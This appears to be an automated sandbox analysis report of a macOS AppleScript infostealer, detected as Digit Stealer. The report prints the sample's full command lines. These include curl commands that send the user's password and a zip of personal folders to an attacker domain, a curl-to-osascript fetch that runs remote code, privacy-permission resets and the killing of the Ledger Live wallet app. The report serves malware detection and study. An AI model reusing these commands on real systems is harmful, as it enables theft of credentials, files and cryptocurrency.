    Source: /bin/bash (PID: 1820)Mutes volume: osascript -e set volume with output mutedJump to behavior
    Source: classification engineClassification label: mal88.troj.spyw.evad.macSCPT@0/28@5/0

    Persistence and Installation Behavior

    barindex
    Terminates several processes with shell command 'killall'
    Source: /bin/bash (PID: 1840)Killall command executed: killall Ledger LiveJump to behavior
    Uploads files by emulating a filled-in form
    Source: /bin/bash (PID: 1745)Curl file upload using -F: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /bin/bash (PID: 1703)Hidden File created: /Users/jess/.53210679051327234f0b2e6abf37d5d7.txtJump to behavior
    Source: /bin/bash (PID: 1676)Osascript command executed: osascript payload_1_stealer.scptJump to behavior
    Source: /bin/bash (PID: 1818)Osascript command executed: osascriptJump to behavior
    Source: /bin/bash (PID: 1820)Osascript command executed: osascript -e set volume with output mutedJump to behavior
    Source: /usr/bin/osascript (PID: 1677)Shell command executed: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5Jump to behavior
    Source: /bin/sh (PID: 1677)Shell command executed: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5Jump to behavior
    Source: /usr/bin/osascript (PID: 1683)Shell command executed: sh -c uuidgenJump to behavior
    Source: /bin/sh (PID: 1683)Shell command executed: sh -c uuidgenJump to behavior
    Source: /usr/bin/osascript (PID: 1684)Shell command executed: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5Jump to behavior
    Source: /bin/sh (PID: 1684)Shell command executed: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5Jump to behavior
    Source: /usr/bin/osascript (PID: 1688)Shell command executed: sh -c tail -n 1 /tmp/wid.txtJump to behavior
    Source: /bin/sh (PID: 1688)Shell command executed: sh -c tail -n 1 /tmp/wid.txtJump to behavior
    Source: /usr/bin/osascript (PID: 1699)Shell command executed: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'Jump to behavior
    Source: /bin/sh (PID: 1699)Shell command executed: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'Jump to behavior
    Source: /usr/bin/osascript (PID: 1700)Shell command executed: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1700)Shell command executed: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &Jump to behavior
    Source: /usr/bin/osascript (PID: 1702)Shell command executed: sh -c echo $HOMEJump to behavior
    Source: /bin/sh (PID: 1702)Shell command executed: sh -c echo $HOMEJump to behavior
    Source: /usr/bin/osascript (PID: 1703)Shell command executed: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'Jump to behavior
    Source: /bin/sh (PID: 1703)Shell command executed: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'Jump to behavior
    Source: /usr/bin/osascript (PID: 1705)Shell command executed: sh -c tccutil reset AllJump to behavior
    Source: /bin/sh (PID: 1705)Shell command executed: sh -c tccutil reset AllJump to behavior
    Source: /usr/bin/osascript (PID: 1736)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DesktopJump to behavior
    Source: /bin/sh (PID: 1736)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DesktopJump to behavior
    Source: /usr/bin/osascript (PID: 1740)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DocumentsJump to behavior
    Source: /bin/sh (PID: 1740)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DocumentsJump to behavior
    Source: /usr/bin/osascript (PID: 1741)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DownloadsJump to behavior
    Source: /bin/sh (PID: 1741)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DownloadsJump to behavior
    Source: /usr/bin/osascript (PID: 1742)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/NotesJump to behavior
    Source: /bin/sh (PID: 1742)Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/NotesJump to behavior
    Source: /usr/bin/osascript (PID: 1743)Shell command executed: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1743)Shell command executed: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /usr/bin/osascript (PID: 1745)Shell command executed: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /bin/sh (PID: 1745)Shell command executed: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /usr/bin/osascript (PID: 1814)Shell command executed: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1814)Shell command executed: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /usr/bin/osascript (PID: 1815)Shell command executed: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'Jump to behavior
    Source: /bin/sh (PID: 1815)Shell command executed: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1816)Shell command executed: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1816)Shell command executed: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &Jump to behavior
    Source: /usr/bin/osascript (PID: 1820)Shell command executed: sh -c osascript -e 'set volume with output muted'Jump to behavior
    Source: /bin/sh (PID: 1820)Shell command executed: sh -c osascript -e 'set volume with output muted'Jump to behavior
    Source: /usr/bin/osascript (PID: 1821)Shell command executed: sh -c mkdir -p '/tmp/downloaded_parts'Jump to behavior
    Source: /bin/sh (PID: 1821)Shell command executed: sh -c mkdir -p '/tmp/downloaded_parts'Jump to behavior
    Source: /usr/bin/osascript (PID: 1823)Shell command executed: sh -c rm -f '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1823)Shell command executed: sh -c rm -f '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1824)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'Jump to behavior
    Source: /bin/sh (PID: 1824)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'Jump to behavior
    Source: /usr/bin/osascript (PID: 1825)Shell command executed: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1825)Shell command executed: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1827)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'Jump to behavior
    Source: /bin/sh (PID: 1827)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'Jump to behavior
    Source: /usr/bin/osascript (PID: 1831)Shell command executed: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1831)Shell command executed: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1833)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'Jump to behavior
    Source: /bin/sh (PID: 1833)Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'Jump to behavior
    Source: /usr/bin/osascript (PID: 1835)Shell command executed: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1835)Shell command executed: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1837)Shell command executed: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1837)Shell command executed: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'Jump to behavior
    Source: /usr/bin/osascript (PID: 1839)Shell command executed: sh -c killall 'Ledger Live' || trueJump to behavior
    Source: /bin/sh (PID: 1839)Shell command executed: sh -c killall 'Ledger Live' || trueJump to behavior
    Source: /usr/bin/nohup (PID: 1701)Curl executable: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentialsJump to behavior
    Source: /bin/bash (PID: 1745)Curl executable: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /usr/bin/nohup (PID: 1817)Curl executable: /usr/bin/curl -> curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspxJump to behavior
    Source: /bin/bash (PID: 1824)Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part1.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspxJump to behavior
    Source: /bin/bash (PID: 1827)Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part2.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspxJump to behavior
    Source: /bin/bash (PID: 1833)Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part3.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspxJump to behavior
    Source: /bin/bash (PID: 1736)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DesktopJump to behavior
    Source: /bin/bash (PID: 1740)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DocumentsJump to behavior
    Source: /bin/bash (PID: 1741)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DownloadsJump to behavior
    Source: /bin/bash (PID: 1742)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/NotesJump to behavior
    Source: /bin/bash (PID: 1821)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/downloaded_partsJump to behavior
    Source: /bin/bash (PID: 1701)Nohup executable: /usr/bin/nohup -> nohup curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentialsJump to behavior
    Source: /bin/bash (PID: 1817)Nohup executable: /usr/bin/nohup -> nohup curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspxJump to behavior
    Source: /bin/bash (PID: 1814)Rm executable: /bin/rm -> rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/bash (PID: 1815)Rm executable: /bin/rm -> rm -f /tmp/a5b9845c461d901dad1363386bac5a75.zipJump to behavior
    Source: /bin/bash (PID: 1823)Rm executable: /bin/rm -> rm -f /tmp/app.asar.zipJump to behavior
    Source: /bin/bash (PID: 1683)Uuidgen executable: /usr/bin/uuidgen -> uuidgenJump to behavior
    Source: /bin/sh (PID: 1677)Shell process: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5Jump to behavior
    Source: /bin/sh (PID: 1683)Shell process: sh -c uuidgenJump to behavior
    Source: /bin/sh (PID: 1684)Shell process: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5Jump to behavior
    Source: /bin/sh (PID: 1688)Shell process: sh -c tail -n 1 /tmp/wid.txtJump to behavior
    Source: /bin/sh (PID: 1699)Shell process: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'Jump to behavior
    Source: /bin/sh (PID: 1700)Shell process: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1702)Shell process: sh -c echo $HOMEJump to behavior
    Source: /bin/sh (PID: 1703)Shell process: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'Jump to behavior
    Source: /bin/sh (PID: 1705)Shell process: sh -c tccutil reset AllJump to behavior
    Source: /bin/sh (PID: 1736)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DesktopJump to behavior
    Source: /bin/sh (PID: 1740)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DocumentsJump to behavior
    Source: /bin/sh (PID: 1741)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/DownloadsJump to behavior
    Source: /bin/sh (PID: 1742)Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/NotesJump to behavior
    Source: /bin/sh (PID: 1743)Shell process: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1745)Shell process: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabberJump to behavior
    Source: /bin/sh (PID: 1814)Shell process: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75Jump to behavior
    Source: /bin/sh (PID: 1815)Shell process: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'Jump to behavior
    Source: /bin/sh (PID: 1816)Shell process: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &Jump to behavior
    Source: /bin/sh (PID: 1820)Shell process: sh -c osascript -e 'set volume with output muted'Jump to behavior
    Source: /bin/sh (PID: 1821)Shell process: sh -c mkdir -p '/tmp/downloaded_parts'Jump to behavior
    Source: /bin/sh (PID: 1823)Shell process: sh -c rm -f '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1824)Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'Jump to behavior
    Source: /bin/sh (PID: 1825)Shell process: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1827)Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'Jump to behavior
    Source: /bin/sh (PID: 1831)Shell process: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1833)Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'Jump to behavior
    Source: /bin/sh (PID: 1835)Shell process: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1837)Shell process: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'Jump to behavior
    Source: /bin/sh (PID: 1839)Shell process: sh -c killall 'Ledger Live' || trueJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
    Source: /usr/bin/zip (PID: 1744)ZIP file created: /private/tmp/a5b9845c461d901dad1363386bac5a75.zipJump to dropped file
    Source: /usr/bin/zip (PID: 1744)ZIP file created: /private/tmp/zixiNUg5Jump to dropped file
    Source: /usr/bin/curl (PID: 1824)ZIP file created: /private/tmp/downloaded_parts/part1.aspxJump to dropped file
    Source: /bin/bash (PID: 1826)ZIP file created: /private/tmp/app.asar.zipJump to dropped file
    Source: /bin/bash (PID: 1679)Awk executable: /usr/bin/awk -> awk -F: /Hardware UUID/ {print $2}Jump to behavior
    Source: /System/Volumes/Preboot/Cryptexes/App/usr/libexec/AuthenticationServicesAgent (PID: 1659)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1676)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1818)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /usr/bin/osascript (PID: 1820)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /System/Applications/System Settings.app/Contents/MacOS/System Settings (PID: 1753)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_BXLAzO/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_dJVnzk/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_031lUb/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JcqD2u/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_Ht0qUQ/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JSAeuO/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_GGD2MG/NotesIndexerState-HTMLJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_8Nhm0A/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_HUu32a/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_oiZkwB/NotesIndexerState-ModernJump to dropped file
    Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_3nR46B/NotesIndexerState-ModernJump to dropped file

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Clears all privacy permission grants using tccutil
    Source: /bin/bash (PID: 1705)Tccutil reset: /usr/bin/tccutil tccutil reset AllJump to behavior
    Source: /bin/bash (PID: 1705)Tccutil executable: /usr/bin/tccutil tccutil reset AllJump to behavior

    Stealing of Sensitive Information

    barindex
    Exfiltrates password data via HTTP using curl
    Source: /usr/bin/nohup (PID: 1701)Curl exfiltrating password: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentialsJump to behavior
    Kills crypto wallet applications indicative for crypto stealers
    Source: /bin/bash (PID: 1840)Kills crypto wallet processes: killall Ledger LiveJump to behavior
    Yara detected Digit Stealer
    Source: Yara matchFile source: payload_1_stealer.scpt, type: SAMPLE
    Executes the "dscl" command with authonly argument (probably to verify the login password)
    Source: /bin/bash (PID: 1699)Security executable: /usr/bin/dscl /usr/bin/dscl /Local/Default -authonly jess 123456Jump to behavior
    Writes files containing the user's password
    Source: /bin/bash (PID: 1703)Default password detected: /Users/jess/.53210679051327234f0b2e6abf37d5d7.txtJump to dropped file
    Source: /bin/bash (PID: 1678)System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataTypeJump to behavior
    Source: /usr/sbin/system_profiler (PID: 1681)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior

    Remote Access Functionality

    barindex
    Yara detected Digit Stealer
    Source: Yara matchFile source: payload_1_stealer.scpt, type: SAMPLE

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting    		Valid Accounts1
    Command and Scripting Interpreter    		1
    Scripting    		Path Interception11
    Impair Defenses    		1
    Unsecured Credentials    		1
    Account Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		1
    Exfiltration Over Alternative Protocol    		1
    Service Stop
    CredentialsDomainsDefault Accounts3
    AppleScript    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Indicator Blocking    		LSASS Memory1
    System Information Discovery    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		1
    Exfiltration Over Web Service    		Network Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Hidden Files and Directories    		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File Deletion    		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
    Application Layer Protocol    		Traffic DuplicationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Shell
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 5177034 Sample: payload_1_stealer.scpt Startdate: 14/01/2026 Architecture: MAC Score: 88 83 goldenticketsshop.com 2->83 85 h3.media.apple.map.fastly.net 146.75.123.6, 443, 58025, 58026 SCCGOVUS Sweden 2->85 87 2 other IPs or domains 2->87 91 Yara detected Digit Stealer 2->91 12 Terminal login 2->12         started        14 launchd xpcproxy AuthenticationServicesAgent 2->14         started        16 launchd xpcproxy Notes 19 2->16         started        18 launchd xpcproxy System Settings 2->18         started        signatures3 process4 process5 20 login bash 12->20         started        process6 22 bash osascript 20->22         started        24 bash 20->24         started        26 bash 20->26         started        28 bash mkdir 20->28         started        process7 30 osascript sh bash 22->30         started        32 osascript sh bash 22->32         started        34 osascript sh bash 1 22->34         started        42 15 other processes 22->42 38 bash path_helper 24->38         started        40 bash touch 1 26->40         started        file8 44 bash osascript 30->44         started        46 bash nohup curl 30->46         started        48 bash nohup curl 32->48         started        81 /Users/jess/.53210...f0b2e6abf37d5d7.txt, ASCII 34->81 dropped 93 Writes files containing the user's password 34->93 95 Uploads files by emulating a filled-in form 42->95 97 Clears all privacy permission grants using tccutil 42->97 99 Executes the "dscl" command with authonly argument (probably to verify the login password) 42->99 51 bash system_profiler 42->51         started        53 bash md5 42->53         started        55 bash md5 42->55         started        57 4 other processes 42->57 signatures9 process10 signatures11 59 osascript sh bash 44->59         started        61 osascript sh bash osascript 44->61         started        64 osascript sh bash 44->64         started        68 8 other processes 44->68 89 Exfiltrates password data via HTTP using curl 48->89 66 system_profiler system_profiler 51->66         started        process12 signatures13 70 bash killall 59->70         started        105 Mutes the volume using AppleScript likely to hide suspicious activity from the user 61->105 73 bash cat 1 64->73         started        75 bash cat 68->75         started        77 bash cat 68->77         started        79 bash unzip 1 68->79         started        process14 signatures15 101 Kills crypto wallet applications indicative for crypto stealers 70->101 103 Terminates several processes with shell command 'killall' 70->103

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.